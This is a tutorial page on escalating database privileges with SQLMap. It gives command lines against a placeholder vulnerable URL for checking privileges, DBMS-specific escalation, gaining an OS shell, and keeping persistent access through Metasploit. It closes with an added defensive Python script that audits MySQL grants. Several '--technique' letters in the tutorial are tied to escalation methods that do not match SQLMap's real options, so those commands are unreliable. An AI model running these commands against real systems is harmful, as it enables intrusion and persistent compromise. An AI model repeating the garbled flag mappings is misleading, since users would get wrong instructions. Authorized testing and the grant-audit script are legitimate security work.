Privilege Escalation

Learn how to perform privilege escalation using SQLMap's advanced techniques

SQLMap provides capabilities to check for and potentially exploit privilege escalation opportunities in various database management systems. These techniques can help identify and leverage excessive privileges during authorized security assessments.

Checking Current Privileges

Identifying Database User Privileges

To check the current database user's privileges:

sqlmap -u "http://www.example.com/vuln.php?id=1" --privileges

This command displays all privileges assigned to the current database user.

Checking DBA Status

To verify if the current user has database administrator privileges:

sqlmap -u "http://www.example.com/vuln.php?id=1" --is-dba

This returns a boolean result indicating whether the current user has DBA privileges.

Automated Privilege Escalation

SQLMap can attempt to automatically escalate privileges:

sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc

This command attempts various privilege escalation techniques based on the detected DBMS.

DBMS-Specific Techniques

MySQL Privilege Escalation

For MySQL, SQLMap can attempt:

  1. User-Defined Function (UDF) injection:
     sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=mysql --technique=U
  2. MOF (Managed Object Format) exploitation on Windows systems:
     sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=mysql --technique=M

Microsoft SQL Server Privilege Escalation

For SQL Server, SQLMap can attempt:

  1. xp_cmdshell re-enabling:
     sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=mssql
  2. SQL Server Agent job creation (requires specific privileges):
     sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=mssql --technique=Q

PostgreSQL Privilege Escalation

For PostgreSQL, SQLMap can attempt:

  1. Custom function creation:
     sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=postgresql
  2. Large object exploitation:
     sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=postgresql --technique=L

Oracle Privilege Escalation

For Oracle, SQLMap can attempt:

  1. PL/SQL injection:
     sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=oracle
  2. Java class loading:
     sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --dbms=oracle --technique=J

Gaining System Access

After privilege escalation, you can attempt to gain system access:

sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --os-shell

This combines privilege escalation with OS shell access attempts.

Maintaining Access

To establish persistent access after privilege escalation:

sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc --os-pwn

This attempts to create a more persistent connection using Metasploit integration.

Troubleshooting Privilege Escalation

If privilege escalation attempts fail:

  1. Verify the injection point supports stacked queries
  2. Check if the database user has sufficient base privileges
  3. Examine if security controls are preventing escalation
  4. Try different techniques with the --technique parameter
  5. Use verbose mode (-v) to get more detailed information about the attempts

Remember that privilege escalation success depends on:

  • The specific DBMS version and configuration
  • Existing security patches and controls
  • The initial privileges of the compromised database user
  • Operating system security settings
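
Because the outcome depends on the initial privileges of the database user, the least-privilege check below is worth running against application accounts before an assessment does it for you. It is an added example, not part of SQLMap or of the original page: it parses MySQL `SHOW GRANTS` output and flags rights that make the UDF route described above reachable. The privilege sets and the sample grant lines are assumptions constructed for illustration.

```python
import re

# Editor's selection of rights a web application's MySQL account should not
# hold (an assumption, tune it for your environment).
RISKY_GLOBAL = {"ALL PRIVILEGES", "FILE", "SUPER", "CREATE USER", "SHUTDOWN"}
SCHEMA_WRITE = {"ALL PRIVILEGES", "INSERT", "UPDATE", "DELETE", "CREATE"}

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<grantee>\S+)"
    r"(?P<opt>.*WITH GRANT OPTION)?",
    re.IGNORECASE,
)

def audit_grants(lines):
    """Return (grantee, scope, privilege, reason) for each risky grant found."""
    findings = []
    for line in lines:
        m = GRANT_RE.match(line.strip())
        if not m:
            continue  # role grants and non-GRANT lines are skipped
        scope = m["scope"].replace("`", "").lower()
        grantee = m["grantee"].replace("`", "").replace("'", "")
        # Drop column lists such as "SELECT (id, name)" before splitting.
        privs = re.sub(r"\([^)]*\)", "", m["privs"])
        privs = {p.strip().upper() for p in privs.split(",") if p.strip()}
        for p in sorted(privs):
            if scope == "*.*" and p in RISKY_GLOBAL:
                findings.append((grantee, scope, p, "global admin or file right"))
            elif scope.split(".")[0] in ("*", "mysql") and p in SCHEMA_WRITE:
                # Registering a loadable function needs INSERT on the mysql schema.
                findings.append((grantee, scope, p, "write access to mysql schema"))
        if m["opt"]:
            findings.append((grantee, scope, "GRANT OPTION", "can pass rights on"))
    return findings

# Constructed sample input, in the format SHOW GRANTS prints (5.7 and 8.0 quoting).
SAMPLE_GRANTS = [
    "GRANT USAGE ON *.* TO `report`@`10.0.0.%`",
    "GRANT SELECT (id, name), UPDATE (name) ON `shop`.`customers` TO `report`@`10.0.0.%`",
    "GRANT FILE, SELECT ON *.* TO `webapp`@`localhost`",
    "GRANT INSERT, DELETE ON `mysql`.* TO `webapp`@`localhost`",
    "GRANT ALL PRIVILEGES ON *.* TO 'legacy'@'%' WITH GRANT OPTION",
]

if __name__ == "__main__":
    for grantee, scope, priv, reason in audit_grants(SAMPLE_GRANTS):
        print(f"{grantee:20} {scope:10} {priv:15} {reason}")
```

An account that produces no findings here still needs `secure_file_priv` and the plugin directory permissions reviewed on the server itself, since those are not visible in grant output.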